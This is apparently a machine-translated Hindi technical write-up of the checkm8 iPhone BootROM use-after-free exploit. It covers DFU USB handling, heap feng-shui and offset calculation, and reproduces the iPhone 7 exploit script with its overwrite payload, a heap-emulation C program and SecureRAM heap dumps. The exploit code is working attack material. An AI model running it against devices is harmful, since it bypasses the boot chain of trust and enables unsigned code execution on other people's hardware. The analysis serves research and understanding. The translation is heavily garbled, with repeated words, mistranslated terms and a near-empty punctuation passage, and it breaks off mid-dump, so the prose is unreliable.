🎒 👨🏻‍🏫 👩🏻‍🔬 चेकम 8 शोषण का तकनीकी विश्लेषण 🔞 🔠 ⛰️

उच्च संभावना के साथ आपने पहले से ही सनसनीखेज चेकम 8 शोषण के बारे में सुना है, जो कि iPhone X सहित अधिकांश iDevices के BootROM में एक BootROM भेद्यता का उपयोग करता है। इस लेख में, हम शोषण का एक तकनीकी विश्लेषण प्रदान करेंगे और भेद्यता के कारणों को देखेंगे। किसी को भी दिलचस्पी - कटौती के तहत आपका स्वागत है!

आप लेख का अंग्रेजी संस्करण यहां पढ़ सकते हैं।

परिचय

सबसे पहले, हम iDevice बूट प्रक्रिया का संक्षेप में वर्णन करेंगे और यह पता BootROM कि BootROM किस स्थान पर है (इसे SecureROM भी कहा जा सकता है) और इसकी आवश्यकता क्यों है। इसके बारे में विस्तृत जानकारी यहाँ है । सरलीकृत बूट प्रक्रिया को निम्नानुसार दर्शाया जा सकता है:

BootROM वह पहली चीज है जो प्रोसेसर चालू होता है जब डिवाइस चालू होता है। BootROM मुख्य कार्य:

प्लेटफ़ॉर्म का प्रारंभ (आवश्यक प्लेटफ़ॉर्म रजिस्टर सेट करना, CPU इनिशियलाइज़ करना आदि)
लोडिंग के अगले चरण में नियंत्रण का सत्यापन और स्थानांतरण
- BootROM IMG3/IMG4 छवियों के पार्सिंग का समर्थन करता है
- BootROM में डिक्रिप्टिंग छवियों के लिए GID कुंजी तक पहुंच है
- छवियों की जांच के लिए, Apple सार्वजनिक कुंजी को BootROM में बनाया गया है, और क्रिप्टोग्राफी के साथ काम करने के लिए आवश्यक कार्यक्षमता है
डिवाइस को पुनर्प्राप्त करना यदि आगे डाउनलोड करना संभव नहीं है ( Device Firmware Update , DFU )

BootROM आकार बहुत छोटा है, और इसे iBoot का एक स्ट्रिप-डाउन संस्करण कहा जा सकता iBoot , क्योंकि वे अधिकांश सिस्टम और लाइब्रेरी कोड साझा करते हैं। हालाँकि, iBoot विपरीत, BootROM को अपडेट नहीं किया जा सकता है। डिवाइस को बनाते समय इसे आंतरिक रीड-ओनली मेमोरी में रखा जाता है। BootROM बूट चेन ट्रस्ट का हार्डवेयर रूट है। इसमें कमजोरियां आगे की डाउनलोड प्रक्रिया पर नियंत्रण पाने और डिवाइस पर अहस्ताक्षरित कोड को निष्पादित करने की अनुमति दे सकती हैं।

चेकम 8 की उपस्थिति

27 सितंबर, 2019 को checkm8 शोषण को इसके लेखक axi0mX द्वारा ipwndfu उपयोगिता में जोड़ा गया था। तब उन्होंने अपने ट्विटर अकाउंट पर एक अपडेट की घोषणा की , जिसमें शोषण और अतिरिक्त जानकारी का वर्णन था। आप थ्रेड से पता लगा सकते हैं कि USB कोड में use-after-free भेद्यता 2018 की गर्मियों में iOS 12 beta लिए आई-बूट की पैच-डिफाइंग iBoot दौरान लेखक द्वारा पाई गई थी। जैसा कि पहले उल्लेख किया गया है, BootROM और BootROM में बहुत से समान कोड हैं, जिसमें USB के लिए कोड भी शामिल है, यही कारण है कि यह भेद्यता भी BootROM लिए प्रासंगिक है।

यह शोषण कोड से भी पता चलता है कि भेद्यता DFU में शोषण किया जाता है। यह एक ऐसी विधा है जिसमें एक हस्ताक्षरित छवि को USB माध्यम से डिवाइस में स्थानांतरित किया जा सकता है, जिसे बाद में डाउनलोड किया जाएगा। यह आवश्यक हो सकता है, उदाहरण के लिए, डिवाइस को पुनर्स्थापित करने के लिए यदि अपडेट असफल है।

उसी दिन, लिटिलैलो ने बताया कि उन्होंने मार्च में इस भेद्यता को पाया था और इसके विवरण को apollo.txt फ़ाइल में प्रकाशित किया था। checkm8 कोड में क्या होता है, इसका वर्णन किया गया है, लेकिन यह शोषण के विवरण को पूरी तरह से स्पष्ट नहीं करता है। इसलिए, हमने इस लेख को लिखने का निर्णय लिया और BootROM में पेलोड के निष्पादन तक के संचालन के सभी विवरणों का समावेश करने का BootROM ।

हमने पहले उल्लिखित सामग्रियों के साथ-साथ फरवरी 2018 में लीक हुए iBoot/SecureROM स्रोत कोड के आधार पर एक शोषण विश्लेषण किया। हमने अपने परीक्षण उपकरण - iPhone 7 ( CPID:8010 ) पर प्रयोगात्मक रूप से प्राप्त डेटा का भी उपयोग किया। checkm8 का उपयोग checkm8 हमने SecureROM और SecureRAM डंप को इससे हटा दिया, जिससे हमें विश्लेषण में मदद मिली।

आवश्यक USB ज्ञान

पता चला भेद्यता USB कोड में है, इसलिए इस इंटरफ़ेस के बारे में कुछ ज्ञान आवश्यक है। आप यहां पूरा स्पेसिफिकेशन पढ़ सकते हैं, लेकिन यह काफी बड़ा है। एक उत्कृष्ट सामग्री, जो आगे की समझ के लिए पर्याप्त से अधिक है, एक नटशेल में यूएसबी है । यहां हम केवल सबसे आवश्यक देते हैं।

विभिन्न प्रकार के USB डेटा ट्रांसफर हैं। DFU केवल Control Transfers मोड का उपयोग करता है (आप इसके बारे में यहां पढ़ सकते हैं)। इस मोड में प्रत्येक लेनदेन में तीन चरण होते हैं:

Setup Stage - इस स्तर पर एक SETUP पैकेट भेजा जाता है, जिसमें निम्नलिखित क्षेत्र होते हैं:
- bmRequestType - अनुरोध की दिशा, प्रकार और रिसीवर का वर्णन करता है
- bRequest - निर्धारित करता है कि कौन सा अनुरोध किया गया है
- wValue , wIndex - अनुरोध के आधार पर, उनकी अलग तरह से व्याख्या की जा सकती है
- wLength - Data Stage में प्राप्त / प्रेषित डेटा की लंबाई
Data Stage - एक वैकल्पिक चरण जिस पर डेटा ट्रांसफर होता है। पिछले चरण से SETUP पैकेट के आधार पर, यह होस्ट से डिवाइस ( OUT ) या इसके विपरीत ( IN ) डेटा भेज सकता है। डेटा छोटे भागों में भेजा जाता है ( Apple DFU के मामले में, यह 0x40 बाइट्स है)।
- जब होस्ट डेटा के अगले बैच को स्थानांतरित करना चाहता है, तो वह एक OUT टोकन भेजता है, जिसके बाद डेटा स्वयं भेजा जाता है।
- जब मेजबान डिवाइस से डेटा प्राप्त करने के लिए तैयार होता है, तो यह एक IN टोकन भेजता है, जिसके जवाब में डिवाइस डेटा भेजता है।
Status Stage - अंतिम चरण जिस पर पूरे लेनदेन की स्थिति बताई जाती है।
- OUT अनुरोधों के लिए, होस्ट एक IN टोकन भेजता है, जिसके जवाब में डिवाइस को शून्य लंबाई का डेटा पैकेट भेजना चाहिए।
- IN अनुरोधों के लिए, होस्ट एक OUT टोकन और एक शून्य-लंबाई डेटा पैकेट भेजता है।

नीचे दिए गए आरेख में OUT और IN क्वेरी दिखाई जाती हैं। हमने जानबूझकर विवरण और इंटरैक्शन स्कीम से ACK , NACK और अन्य हैंडशेक पैकेज हटा दिए, क्योंकि वे शोषण में खुद एक विशेष भूमिका नहीं निभाते हैं।

विश्लेषण apollo.txt

हमने apollo.txt डॉक्यूमेंट से भेद्यता को पार्स करके विश्लेषण शुरू किया। यह DFU मोड के एल्गोरिथ्म का वर्णन करता है:

https://gist.github.com/littlelailo/42c6a11d31877f98531f6d30444f59c4
जब usf को dfu पर एक छवि प्राप्त करने के लिए शुरू किया जाता है, dfu सभी कमांड को संभालने के लिए एक इंटरफ़ेस रजिस्टर करता है और इनपुट और आउटपुट के लिए एक बफर आवंटित करता है
यदि आप डेटा को dfu में भेजते हैं तो सेटअप पैकेट मुख्य कोड द्वारा संभाला जाता है जो तब इंटरफ़ेस कोड को कॉल करता है
इंटरफ़ेस कोड यह पुष्टि करता है कि तरंगदैर्ध्य इनपुट आउटपुट बफर लंबाई से छोटा है और यदि ऐसा है तो यह एक संकेतक को इनपुट आउटपुट बफर के लिए एक सूचक के साथ एक तर्क के रूप में अद्यतन करता है।
यह तब तरंगित होता है जो वह लंबाई है जो बफर में प्राप्त करना चाहता है
usb मुख्य कोड तब लंबाई के साथ एक वैश्विक संस्करण को अद्यतन करता है और डेटा संकुल को पुनः प्राप्त करने के लिए तैयार हो जाता है
यदि कोई डेटा पैकेज प्राप्त होता है, तो यह सूचक के माध्यम से इनपुट आउटपुट बफर को लिखा जाता है, जिसे एक तर्क के रूप में पारित किया गया था और कितने बाइट पहले से ही प्राप्त किए गए थे, इसका ट्रैक रखने के लिए एक और वैश्विक चर का उपयोग किया जाता है।
यदि सभी डेटा को पुनः प्राप्त किया गया था तो dfu विशिष्ट कोड को फिर से कॉल किया जाता है और फिर इनपुट आउटपुट बफर की सामग्री को मेमोरी स्थान पर कॉपी करने के लिए जाता है जहां से बाद में छवि बूट की जाती है
उसके बाद usb कोड सभी वेरिएबल्स को रीसेट करता है और नए पैकेज को हैंडल करता है
अगर dfu इनपुट आउटपुट बफ़र से बाहर निकलता है और यदि छवि का पार्सिंग बूट्रोम रेफ़र्स डफ़ू को विफल करता है

सबसे पहले, हमने iBoot स्रोत कोड के साथ वर्णित चरणों की तुलना की। चूँकि हम लेख में लीक हुए स्रोत कोड के टुकड़ों का उपयोग नहीं कर सकते हैं, हम IDA में हमारे iPhone 7 रिवर्स इंजीनियरिंग के SecureROM द्वारा प्राप्त SecureROM को SecureROM । आप आसानी से iBoot का सोर्स कोड पा सकते हैं और इसे नेविगेट कर सकते हैं।

जब DFU मोड को इनिशियलाइज़ किया जाता है, एक IO बफर आवंटित किया जाता है और DFU लिए प्रोसेसिंग अनुरोधों के लिए एक USB इंटरफ़ेस पंजीकृत किया जाता है:

जब SETUP अनुरोध पैकेट DFU में आता है, तो संबंधित इंटरफ़ेस हैंडलर कहा जाता है। OUT अनुरोध के सफल निष्पादन के मामले में (उदाहरण के लिए, छवि को स्थानांतरित करते समय), हैंडलर को लेन-देन के लिए IO बफर का पता और उस डेटा के आकार को वापस करना होगा जिसे वह सूचक द्वारा प्राप्त करने की अपेक्षा करता है। इस स्थिति में, बफ़र पता और अपेक्षित डेटा का आकार वैश्विक चर में संग्रहीत किया जाता है।

DFU लिए इंटरफ़ेस हैंडलर नीचे स्क्रीनशॉट में दिखाया गया है। यदि अनुरोध सही है, तो DFU आरंभीकरण चरण में आवंटित IO बफर का पता और अपेक्षित डेटा, जो SETUP पैकेट से लिया गया है, सूचक द्वारा वापस कर दिया जाता है।

Data Stage दौरान, Data Stage प्रत्येक टुकड़ा IO बफर को लिखा जाता है, जिसके बाद IO बफर का पता स्थानांतरित कर दिया जाता है और प्राप्त डेटा का काउंटर अपडेट किया जाता है। सभी अपेक्षित डेटा प्राप्त करने के बाद, इंटरफ़ेस डेटा हैंडलर कहा जाता है और वैश्विक संचरण स्थिति को साफ़ कर दिया जाता है।

DFU डेटा हैंडलर में, प्राप्त डेटा को मेमोरी क्षेत्र में ले जाया जाता है, जहां से डाउनलोड जारी रहेगा। iBoot source कोड को देखते हुए Apple इस मेमोरी एरिया को INSECURE_MEMORY कहा जाता है।

DFU मोड से बाहर निकलने पर, पहले से आवंटित IO बफर को मुक्त कर दिया जाएगा। यदि छवि को DFU मोड में सफलतापूर्वक प्राप्त किया गया था, तो इसे चेक किया जाएगा और लोड किया जाएगा। यदि, DFU मोड के संचालन के दौरान, कुछ त्रुटि हुई या परिणामी छवि को लोड करना असंभव है, तो DFU को फिर से DFU जाएगा और सब कुछ फिर से शुरू हो जाएगा।

वर्णित एल्गोरिथ्म में use-after-free भेद्यता निहित है। यदि बूट पर, एक SETUP पैकेट भेजें और Data Stage को छोड़ कर लेन-देन पूरा करें, तो वैश्विक स्थिति DFU चक्र में फिर से प्रवेश करने पर आरंभिक रहेगी, और हम पिछले DFU पुनरावृत्ति में आवंटित IO बफर के पते पर लिख सकेंगे।

use-after-free भेद्यता से निपटने के use-after-free , हमने सोचा: मैं DFU के अगले पुनरावृत्ति के दौरान कुछ कैसे लिख सकता हूं? सब के बाद, DFU फिर से शुरू करने से पहले DFU पहले से आवंटित सभी संसाधनों को मुक्त कर दिया गया है, और नए पुनरावृत्ति में मेमोरी स्थान बिल्कुल समान होना चाहिए। यह पता चला है कि एक और दिलचस्प और सुंदर सुंदर मेमोरी लीक त्रुटि है जो use-after-free भेद्यता use-after-free शोषण करने की अनुमति देती है, जिसे हम बाद में चर्चा करेंगे।

Checkm8 विश्लेषण

हम सीधे checkm8 शोषण के विश्लेषण के लिए आगे बढ़ते हैं। सादगी के लिए, हम iPhone 7 लिए शोषण के एक संशोधित संस्करण का विश्लेषण करेंगे, जिसमें अन्य प्लेटफार्मों के साथ जुड़े कोड को हटा दिया गया है, शोषण को खोए बिना USB अनुरोधों के अनुक्रम और प्रकारों को बदल दिया गया है। इसके अलावा इस संस्करण में पेलोड के निर्माण की प्रक्रिया को हटा दिया गया है, इसे मूल checkm8.py फ़ाइल में पाया जा सकता है। अन्य उपकरणों के लिए संस्करणों के बीच अंतर को समझना मुश्किल नहीं होना चाहिए।

 #!/usr/bin/env python from checkm8 import * def main(): print '*** checkm8 exploit by axi0mX ***' device = dfu.acquire_device(1800) start = time.time() print 'Found:', device.serial_number if 'PWND:[' in device.serial_number: print 'Device is already in pwned DFU Mode. Not executing exploit.' return payload, _ = exploit_config(device.serial_number) t8010_nop_gadget = 0x10000CC6C callback_chain = 0x1800B0800 t8010_overwrite = '\0' * 0x5c0 t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain) # heap feng-shui stall(device) leak(device) for i in range(6): no_leak(device) dfu.usb_reset(device) dfu.release_device(device) # set global state and restart usb device = dfu.acquire_device() device.serial_number libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001) libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) dfu.release_device(device) time.sleep(0.5) # heap occupation device = dfu.acquire_device() device.serial_number stall(device) leak(device) leak(device) libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50) for i in range(0, len(payload), 0x800): libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 50) dfu.usb_reset(device) dfu.release_device(device) device = dfu.acquire_device() if 'PWND:[checkm8]' not in device.serial_number: print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.' sys.exit(1) print 'Device is now in pwned DFU Mode.' print '(%0.2f seconds)' % (time.time() - start) dfu.release_device(device) if __name__ == '__main__': main()

checkm8 कार्य को कई चरणों में विभाजित किया जा सकता है:

ढेर की तैयारी ( heap feng-shui )
वैश्विक राज्य को मंजूरी के बिना IO बफर का आवंटन और रिलीज
use-after-free साथ ढेर पर usb_device_io_request
पेलोड प्लेसमेंट
callback-chain निष्पादन
shellcode निष्पादन

प्रत्येक चरण पर विस्तार से विचार करें।

1. ढेर की तैयारी (ढेर फेंग-शुई)

यह हमें लगता है कि यह सबसे दिलचस्प चरण है, और हमने इस पर विशेष ध्यान दिया।

 stall(device) leak(device) for i in range(6): no_leak(device) dfu.usb_reset(device) dfu.release_device(device)

यह कदम use-after-free संचालन के लिए एक सुविधाजनक ढेर राज्य को प्राप्त करने के लिए आवश्यक है। शुरू करने के लिए, कॉल stall , leak , no_leak विचार करें:

 def stall(device): libusb1_async_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 'A' * 0xC0, 0.00001) def leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC0, 1) def no_leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC1, 1)

libusb1_no_error_ctrl_transfer पर एक आवरण है। अनुरोध को निष्पादित करते समय हुई किसी भी अपवाद को अनदेखा करने के साथ। libusb1_async_ctrl_transfer - अतुल्यकालिक क्वेरी निष्पादन के लिए libusb_submit_transfer फ़ंक्शन को libusb से libusb_submit_transfer करता है।

दोनों कॉल निम्नलिखित मापदंडों को स्वीकार करते हैं:

डिवाइस का उदाहरण
SETUP पैकेज के लिए डेटा (उनका विवरण यहां है ):
- bmRequestType
- bRequest
- wValue
- wIndex
डेटा आकार ( wLength ) या Data Stage लिए Data Stage
टाइमआउट का अनुरोध करें

तर्क bmRequestType , bRequest , wValue और wIndex तीनों प्रकार के प्रश्नों के लिए सामान्य हैं। उनका मतलब है:

bmRequestType = 0x80
- 0b1XXXXXXX - डिवाइस से होस्ट तक Data Stage की दिशा (डिवाइस टू होस्ट)
- 0bX00XXXXX - मानक अनुरोध प्रकार
- 0bXXX00000 - अनुरोध के रिसीवर - डिवाइस
bRequest = 6 - वर्णनकर्ता के लिए अनुरोध ( GET_DESCRIPTOR )
wValue = 0x304
- wValueHigh = 0x3 - प्राप्त करने के लिए डिस्क्रिप्टर के प्रकार को निर्धारित करता है - स्ट्रिंग ( USB_DT_STRING )
- wValueLow = 0x4 स्ट्रिंग डिस्क्रिप्टर का सूचकांक है, 4 डिवाइस के सीरियल नंबर से मेल खाता है (इस मामले में, स्ट्रिंग CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0C ECID:001A40362045E526 IBFL:3C SRTG:[iBoot-2696.0.0.1.33] )
wIndex = 0x40A - स्ट्रिंग भाषा की पहचानकर्ता, इसका मान संचालन के लिए महत्वपूर्ण नहीं है और इसे बदला जा सकता है।

इन तीन अनुरोधों में से किसी के लिए, 0x30 बाइट्स को निम्नलिखित संरचना के ऑब्जेक्ट के लिए ढेर पर आवंटित किया जाता है:

इस ऑब्जेक्ट के सबसे दिलचस्प क्षेत्र callback और next ।

callback - फ़ंक्शन के लिए एक पॉइंटर जिसे अनुरोध पूरा होने पर बुलाया जाएगा।
next - उसी प्रकार के अगले ऑब्जेक्ट के लिए एक संकेतक, कतारबद्ध अनुरोधों के लिए आवश्यक।

stall पर कॉल करने की एक प्रमुख विशेषता अनुरोध के अतुल्यकालिक निष्पादन का उपयोग न्यूनतम टाइमआउट के साथ करना है। इसके कारण, यदि आप भाग्यशाली हैं, तो अनुरोध ओएस स्तर पर रद्द कर दिया जाएगा और निष्पादन कतार में रहेगा, और लेनदेन पूरा नहीं होगा। इसी समय, डिवाइस सभी आने वाले SETUP पैकेट को स्वीकार करना जारी रखेगा और यदि आवश्यक हो, तो उन्हें निष्पादन कतार में रखें। बाद में, Arduino पर एक USB साथ प्रयोगों का उपयोग करते हुए Arduino हम यह पता लगाने में सक्षम थे कि सफल संचालन के लिए मेजबान को एक SETUP पैकेट और एक IN टोकन भेजना चाहिए, जिसके बाद लेन-देन को टाइमआउट द्वारा रद्द किया जाना चाहिए। योजनाबद्ध रूप से, इस तरह के अपूर्ण लेनदेन को निम्नानुसार दर्शाया जा सकता है:

बाकी अनुरोध केवल लंबाई में और केवल एक से भिन्न होते हैं। तथ्य यह है कि मानक प्रश्नों के लिए एक मानक callback है जो इस तरह दिखता है:

io_length मान अनुरोध के SETUP पैकेट और अनुरोधित विवरणक की मूल लंबाई में wLength की न्यूनतम के बराबर है। इस तथ्य के कारण कि विवरणक काफी लंबा है, हम इसकी लंबाई के भीतर io_length मान को ठीक से नियंत्रित कर सकते हैं। g_setup_request.wLength का मान पिछले SETUP पैकेट के wLength मान के बराबर है, इस स्थिति में, 0xC1 ।

इस प्रकार, stall और leak कॉल का उपयोग करके उत्पन्न क्वेरी के पूरा होने पर, अंतिम callback फ़ंक्शन में स्थिति संतुष्ट होती है, और usb_core_send_zlp() कहा जाता है। यह कॉल केवल एक zero-length-packet बनाता है और इसे निष्पादन कतार में जोड़ता है। लेन-देन के लिए Status Stage में सही तरीके से पूरा करने के लिए यह आवश्यक है।

अनुरोध usb_core_complete_endpoint_io फ़ंक्शन पर कॉल के साथ समाप्त होता है, जो पहले callback कहता है और फिर अनुरोध मेमोरी को मुक्त करता है। उसी समय, अनुरोध पूरा होने पर न केवल तब हो सकता है जब संपूर्ण लेनदेन वास्तव में पूरा हो जाता है, बल्कि यह भी जब USB रीसेट हो। जैसे ही एक USB रीसेट सिग्नल प्राप्त होता है, अनुरोध कतार को बायपास कर दिया जाएगा और उनमें से प्रत्येक पूरा हो जाएगा।

चयनात्मक कॉल usb_core_send_zlp() , अनुरोध कतार को दरकिनार करके और फिर उन्हें जारी करने के कारण, आप use-after-free संचालन के लिए पर्याप्त ढेर नियंत्रण प्राप्त कर सकते हैं। सबसे पहले, हम रिलीज़ चक्र को स्वयं देखें:

अनुरोध कतार को पहले साफ़ किया जाता है, फिर रद्द किए usb_core_complete_endpoint_io अनुरोधों को usb_core_complete_endpoint_io , और उन्हें usb_core_complete_endpoint_io कॉल करके पूरा किया usb_core_complete_endpoint_io । उसी समय, usb_core_send_zlp का उपयोग करके चयनित अनुरोधों को ep->io_head में रखा गया है। USB रीसेट प्रक्रिया पूरी होने के बाद, समापन बिंदु के बारे में सभी जानकारी रीसेट हो जाएगी, जिसमें io_head और io_tail , और शून्य-लंबाई अनुरोध ढेर पर रहेगा। तो आप बाकी ढेर के बीच में एक छोटा हिस्सा बना सकते हैं। नीचे दिए गए आरेख से पता चलता है कि यह कैसे होता है:

SecureROM में ढेर को इस तरह SecureROM डिज़ाइन किया गया है कि एक नए मेमोरी क्षेत्र को सबसे छोटे आकार के उपयुक्त फ्री चंक से आवंटित किया गया है। ऊपर वर्णित विधि द्वारा एक छोटा सा मुफ्त हिस्सा बनाकर, आप USB आरंभीकरण के दौरान मेमोरी के आवंटन और io_buffer के आवंटन और अनुरोधों को प्रभावित कर सकते हैं।

बेहतर समझ के लिए, DFU इनिशियलाइज़ेशन के दौरान यह जानने की कोशिश करें कि कौन से ढेर अनुरोध हैं। iBoot स्रोत कोड और iBoot रिवर्स इंजीनियरिंग का विश्लेषण करने के क्रम में SecureROM हम निम्नलिखित अनुक्रम प्राप्त करने में कामयाब रहे:

1. विभिन्न स्ट्रिंग डिस्क्रिप्टर का आवंटन
  - 1.1। Nonce (आकार 234 )
  - 1.2। Manufacturer ( 22 )
  - 1.3। Product ( 62 )
  - 1.4। Serial Number ( 198 )
  - 1.5। Configuration string ( 62 )
1. आवंटन USB के कार्य के निर्माण के साथ जुड़ा हुआ है
  - 2.1। कार्य संरचना ( 0x3c0 )
  - 2.2। स्टैक टास्क ( 0x1000 )
1. io_buffer ( io_buffer )
1. कॉन्फ़िगरेशन डिस्क्रिप्टर
  - 4.1। High-Speed ( 25 )
  - 4.2। Full-Speed ( 25 )

फिर अनुरोध संरचनाओं का एक आवंटन है। यदि ढेर स्थान के बीच में एक छोटा हिस्सा है, तो पहली श्रेणी से कुछ आवंटन इस चंक में जाएंगे, और अन्य सभी आवंटन स्थानांतरित हो जाएंगे, जिसके कारण हम पुराने बफर का जिक्र करते हुए usb_device_io_request को ओवरफ्लो कर सकते हैं। योजनाबद्ध रूप से, इसे निम्नानुसार दर्शाया जा सकता है:

आवश्यक पूर्वाग्रह की गणना करने के लिए, हमने बस ऊपर सूचीबद्ध आवंटन का अनुकरण करने का फैसला किया, iBoot के स्रोत कोड को थोड़ा सा iBoot ।

DFU ढेर उत्सर्जन

 #include "heap.h" #include <stdio.h> #include <unistd.h> #include <sys/mman.h> #ifndef NOLEAK #define NOLEAK (8) #endif int main() { void * chunk = mmap((void *)0x1004000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("chunk = %p\n", chunk); heap_add_chunk(chunk, 0x100000, 1); malloc(0x3c0); //        SecureRAM void * descs[10]; void * io_req[100]; descs[0] = malloc(234); descs[1] = malloc(22); descs[2] = malloc(62); descs[3] = malloc(198); descs[4] = malloc(62); const int N = NOLEAK; void * task = malloc(0x3c0); void * task_stack = malloc(0x4000); void * io_buf_0 = memalign(0x800, 0x40); void * hs = malloc(25); void * fs = malloc(25); void * zlps[2]; for(int i = 0; i < N; i++) { io_req[i] = malloc(0x30); } for(int i = 0; i < N; i++) { if(i < 2) { zlps[i] = malloc(0x30); } free(io_req[i]); } for(int i = 0; i < 5; i++) { printf("descs[%d] = %p\n", i, descs[i]); } printf("task = %p\n", task); printf("task_stack = %p\n", task_stack); printf("io_buf = %p\n", io_buf_0); printf("hs = %p\n", hs); printf("fs = %p\n", fs); for(int i = 0; i < 2; i++) { printf("zlps[%d] = %p\n", i, zlps[i]); } printf("**********\n"); for(int i = 0; i < 5; i++) { free(descs[i]); } free(task); free(task_stack); free(io_buf_0); free(hs); free(fs); descs[0] = malloc(234); descs[1] = malloc(22); descs[2] = malloc(62); descs[3] = malloc(198); descs[4] = malloc(62); task = malloc(0x3c0); task_stack = malloc(0x4000); void * io_buf_1 = memalign(0x800, 0x40); hs = malloc(25); fs = malloc(25); for(int i = 0; i < 5; i++) { printf("descs[%d] = %p\n", i, descs[i]); } printf("task = %p\n", task); printf("task_stack = %p\n", task_stack); printf("io_buf = %p\n", io_buf_1); printf("hs = %p\n", hs); printf("fs = %p\n", fs); for(int i = 0; i < 5; i++) { io_req[i] = malloc(0x30); printf("io_req[%d] = %p\n", i, io_req[i]); } printf("**********\n"); printf("io_req_off = %#lx\n", (int64_t)io_req[0] - (int64_t)io_buf_0); printf("hs_off = %#lx\n", (int64_t)hs - (int64_t)io_buf_0); printf("fs_off = %#lx\n", (int64_t)fs - (int64_t)io_buf_0); return 0; }

heap feng-shui चरण में 8 अनुरोधों के साथ कार्यक्रम उत्पादन:

 chunk = 0x1004000 descs[0] = 0x1004480 descs[1] = 0x10045c0 descs[2] = 0x1004640 descs[3] = 0x10046c0 descs[4] = 0x1004800 task = 0x1004880 task_stack = 0x1004c80 io_buf = 0x1008d00 hs = 0x1009540 fs = 0x10095c0 zlps[0] = 0x1009a40 zlps[1] = 0x1009640 ********** descs[0] = 0x10096c0 descs[1] = 0x1009800 descs[2] = 0x1009880 descs[3] = 0x1009900 descs[4] = 0x1004480 task = 0x1004500 task_stack = 0x1004900 io_buf = 0x1008980 hs = 0x10091c0 fs = 0x1009240 io_req[0] = 0x10092c0 io_req[1] = 0x1009340 io_req[2] = 0x10093c0 io_req[3] = 0x1009440 io_req[4] = 0x10094c0 ********** io_req_off = 0x5c0 hs_off = 0x4c0 fs_off = 0x540

अगला usb_device_io_request पिछले बफर की शुरुआत से ऑफसेट 0x5c0 पर होगा, जो शोषण कोड से मेल खाता है:

 t8010_overwrite = '\0' * 0x5c0 t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

, SecureRAM , checkm8 . , . , usb_device_io_request , .

 #!/usr/bin/env python3 import struct from hexdump import hexdump with open('HEAP', 'rb') as f: heap = f.read() cur = 0x4000 def parse_header(cur): _, _, _, _, this_size, t = struct.unpack('<QQQQQQ', heap[cur:cur + 0x30]) is_free = t & 1 prev_free = (t >> 1) & 1 prev_size = t >> 2 this_size *= 0x40 prev_size *= 0x40 return this_size, is_free, prev_size, prev_free while True: try: this_size, is_free, prev_size, prev_free = parse_header(cur) except Exception as ex: break print('chunk at', hex(cur + 0x40)) if this_size == 0: if cur in (0x9180, 0x9200, 0x9280): #    this_size = 0x80 else: break print(hex(this_size), 'free' if is_free else 'non-free', hex(prev_size), prev_free) hexdump(heap[cur + 0x40:cur + min(this_size, 0x100)]) cur += this_size

. , .

SecureRAM

 chunk at 0x4040 0x40 non-free 0x0 0 chunk at 0x4080 0x80 non-free 0x40 0 00000000: 00 41 1B 80 01 00 00 00 00 00 00 00 00 00 00 00 .A.............. 00000010: 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 ................ 00000020: FF 00 00 00 00 00 00 00 68 3F 08 80 01 00 00 00 ........h?...... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x4100 0x140 non-free 0x80 0 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4240 0x240 non-free 0x140 0 00000000: 68 6F 73 74 20 62 72 69 64 67 65 00 00 00 00 00 host bridge..... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4480 // descs[4], conf string 0x80 non-free 0x240 0 00000000: 3E 03 41 00 70 00 70 00 6C 00 65 00 20 00 4D 00 >.Apple .M. 00000010: 6F 00 62 00 69 00 6C 00 65 00 20 00 44 00 65 00 obile .De 00000020: 76 00 69 00 63 00 65 00 20 00 28 00 44 00 46 00 vice .(.DF 00000030: 55 00 20 00 4D 00 6F 00 64 00 65 00 29 00 FE FF U. .Mode)... chunk at 0x4500 // task 0x400 non-free 0x80 0 00000000: 6B 73 61 